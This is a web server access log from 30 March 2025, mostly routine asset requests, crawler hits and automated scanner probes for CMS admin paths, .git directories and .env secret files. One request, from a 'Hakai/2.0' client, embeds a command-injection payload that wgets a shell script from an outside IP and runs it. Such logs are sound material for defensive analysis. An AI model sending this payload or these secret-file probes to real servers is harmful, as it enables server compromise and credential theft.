52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://triadian.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://triadian.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://triadian.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:18 +0200] "GET /gui/javascript/form_form.js?1743299238 HTTP/1.1" 200 16206 "http://triadian.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://triadian.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://triadian.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://triadian.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://triadian.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://triadian.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://triadian.castlegem.co.uk/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://triadian.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://triadian.castlegem.co.uk/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://triadian.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2386 "http://triadian.castlegem.co.uk/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:19 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://triadian.castlegem.co.uk/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:20 +0200] "GET /gui/javascript/form_form.js?1743299239 HTTP/1.1" 200 16206 "http://triadian.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:20 +0200] "GET /gui/javascript/form_form.js?1743299240 HTTP/1.1" 200 16206 "http://triadian.castlegem.co.uk/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:20 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://triadian.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
52.13.202.156 - - [30/Mar/2025:03:47:20 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://triadian.castlegem.co.uk/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /js HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:10.0) Gecko/20100101 Firefox/62.0"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /sites/default/files HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /wp-content/plugins HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20120121 Firefox/46.0"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /sites/all HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /components HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /module HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /resources/uploads/ HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:62.0) Gecko/20100101 Firefox/49.0"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /modules HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /resources/ HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/31.0"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET /wp-content/uploads HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0"
44.243.9.156 - - [30/Mar/2025:03:47:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
44.243.9.156 - - [30/Mar/2025:03:47:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows ME 4.9; rv:31.0) Gecko/20100101 Firefox/31.7"
44.243.9.156 - - [30/Mar/2025:03:47:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; OpenBSD i386; rv:72.0) Gecko/20100101 Firefox/72.0"
44.243.9.156 - - [30/Mar/2025:03:47:27 +0200] "GET /administrator HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
44.243.9.156 - - [30/Mar/2025:03:47:27 +0200] "GET /wp-login.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0"
54.184.222.234 - - [30/Mar/2025:03:47:35 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:36 +0200] "GET /doesntexist-123 HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:36 +0200] "GET /login/login HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:36 +0200] "GET /console HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:37 +0200] "GET /appliance/login HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:37 +0200] "GET /error.json HTTP/1.1" 404 366 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:37 +0200] "GET /api HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:37 +0200] "GET /index.html HTTP/1.1" 404 366 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:38 +0200] "GET /favicon.ico HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:38 +0200] "GET /jasperserver/login.html HTTP/1.1" 404 379 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.184.222.234 - - [30/Mar/2025:03:47:39 +0200] "GET /jasperserver-pro/login.html HTTP/1.1" 404 383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /wp-content/plugins HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /sites/default/files HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /components HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/58.0.1"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /js HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /sites/all HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows ME 4.9; rv:35.0) Gecko/20100101 Firefox/35.0"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /wp-content/uploads HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /modules HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /module HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.13; ko; rv:1.9.1b2) Gecko/20081201 Firefox/60.0"
54.202.63.109 - - [30/Mar/2025:03:47:43 +0200] "GET /resources/uploads/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
54.202.63.109 - - [30/Mar/2025:03:47:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; OpenBSD i386; rv:72.0) Gecko/20100101 Firefox/72.0"
54.202.63.109 - - [30/Mar/2025:03:47:44 +0200] "GET /resources/ HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.66.18) Gecko/20177177 Firefox/45.66.18"
54.202.63.109 - - [30/Mar/2025:03:47:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows ME 4.9; rv:35.0) Gecko/20100101 Firefox/35.0"
54.202.63.109 - - [30/Mar/2025:03:47:45 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux i586; rv:63.0) Gecko/20100101 Firefox/63.0"
54.202.63.109 - - [30/Mar/2025:03:47:45 +0200] "GET /wp-login.php HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
54.202.63.109 - - [30/Mar/2025:03:47:45 +0200] "GET /administrator HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.59.12) Gecko/20160044 Firefox/52.59.12"
35.89.20.253 - - [30/Mar/2025:03:48:47 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:47 +0200] "GET /doesntexist-123 HTTP/1.1" 404 375 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:47 +0200] "GET /login/login HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:48 +0200] "GET /console HTTP/1.1" 404 367 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:48 +0200] "GET /appliance/login HTTP/1.1" 404 375 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:48 +0200] "GET /error.json HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:49 +0200] "GET /api HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:49 +0200] "GET /index.html HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:49 +0200] "GET /favicon.ico HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:50 +0200] "GET /jasperserver/login.html HTTP/1.1" 404 383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.89.20.253 - - [30/Mar/2025:03:48:50 +0200] "GET /jasperserver-pro/login.html HTTP/1.1" 404 387 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
35.86.175.131 - - [30/Mar/2025:03:48:55 +0200] "GET /wp-content/plugins HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"
35.86.175.131 - - [30/Mar/2025:03:48:55 +0200] "GET /sites/default/files HTTP/1.1" 404 301 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
35.86.175.131 - - [30/Mar/2025:03:48:55 +0200] "GET /components HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
35.86.175.131 - - [30/Mar/2025:03:48:55 +0200] "GET /sites/all HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:62.0) Gecko/20100101 Firefox/49.0"
35.86.175.131 - - [30/Mar/2025:03:48:55 +0200] "GET /resources/ HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 9.1; en-US; rv:12.9.1.11) Gecko/20100821 Firefox/70"
35.86.175.131 - - [30/Mar/2025:03:48:56 +0200] "GET /wp-content/uploads HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0"
35.86.175.131 - - [30/Mar/2025:03:48:56 +0200] "GET /js HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu i686; rv:52.0) Gecko/20100101 Firefox/52.0"
35.86.175.131 - - [30/Mar/2025:03:48:56 +0200] "GET /modules HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0"
35.86.175.131 - - [30/Mar/2025:03:48:56 +0200] "GET /resources/uploads/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows ME 4.9; rv:31.0) Gecko/20100101 Firefox/31.7"
35.86.175.131 - - [30/Mar/2025:03:48:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
35.86.175.131 - - [30/Mar/2025:03:48:56 +0200] "GET /module HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/73.0"
35.86.175.131 - - [30/Mar/2025:03:48:57 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0"
35.86.175.131 - - [30/Mar/2025:03:48:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows ME 4.9; rv:35.0) Gecko/20100101 Firefox/35.0"
35.86.175.131 - - [30/Mar/2025:03:48:58 +0200] "GET /wp-login.php HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0"
35.86.175.131 - - [30/Mar/2025:03:48:58 +0200] "GET /administrator HTTP/1.1" 404 296 "-" "Mozilla/5.0 (X11; Ubuntu i686; rv:52.0) Gecko/20100101 Firefox/52.0"
43.153.54.138 - - [30/Mar/2025:03:56:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
156.59.198.136 - - [30/Mar/2025:04:09:23 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11444413.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
196.251.70.87 - - [30/Mar/2025:04:19:39 +0200] "GET /.git/objects/ HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36"
154.81.156.35 - - [30/Mar/2025:04:37:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.106.43.238 - - [30/Mar/2025:04:38:37 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0"
179.43.186.225 - - [30/Mar/2025:04:47:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
179.43.186.225 - - [30/Mar/2025:04:47:06 +0200] "GET /hw-sys.htm HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.19"
156.59.198.135 - - [30/Mar/2025:04:52:14 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10320004.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [30/Mar/2025:04:52:24 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10253557.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
83.142.111.116 - - [30/Mar/2025:04:57:31 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
154.81.156.10 - - [30/Mar/2025:04:59:33 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
2.57.122.161 - - [30/Mar/2025:05:31:37 +0200] "GET /3/3/3/3/3/3/3/3/3/3/3/3/3/3/3/3 HTTP/1.1" 404 282 "-" "Mozilla/5.0 zgrab/0.x"
204.76.203.15 - - [30/Mar/2025:05:37:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.163.15.217 - - [30/Mar/2025:06:02:34 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [30/Mar/2025:06:11:19 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11271503.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.35 - - [30/Mar/2025:06:12:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.121.133.117 - - [30/Mar/2025:06:12:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
78.153.140.151 - - [30/Mar/2025:06:19:34 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; it-it; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.151 - - [30/Mar/2025:06:19:35 +0200] "GET /.env-sample HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36"
78.153.140.151 - - [30/Mar/2025:06:19:35 +0200] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.151 - - [30/Mar/2025:06:19:35 +0200] "GET /dependencies/.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36"
78.153.140.151 - - [30/Mar/2025:06:19:36 +0200] "GET /user/.env HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1"
78.153.140.151 - - [30/Mar/2025:06:19:36 +0200] "GET /back/.env HTTP/1.1" 404 354 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC) Opera 5.12 [en]"
78.153.140.151 - - [30/Mar/2025:06:19:39 +0200] "GET /security/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1) Gecko/20060111 Firefox/0.10"
78.153.140.151 - - [30/Mar/2025:06:19:39 +0200] "GET /admins/.env HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Mobile; LYF/F61F/LYF-F61F-000-01-17-211217; Android; rv:48.0) Gecko/48.0 Firefox/48.0 KAIOS/2.0"
185.191.127.222 - - [30/Mar/2025:06:21:19 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [30/Mar/2025:06:24:09 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10424557.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
163.5.241.90 - - [30/Mar/2025:06:30:51 +0200] "GET / HTTP/1.1" 200 274 "-" "Python/3.11 aiohttp/3.11.11"
154.81.156.10 - - [30/Mar/2025:06:32:07 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
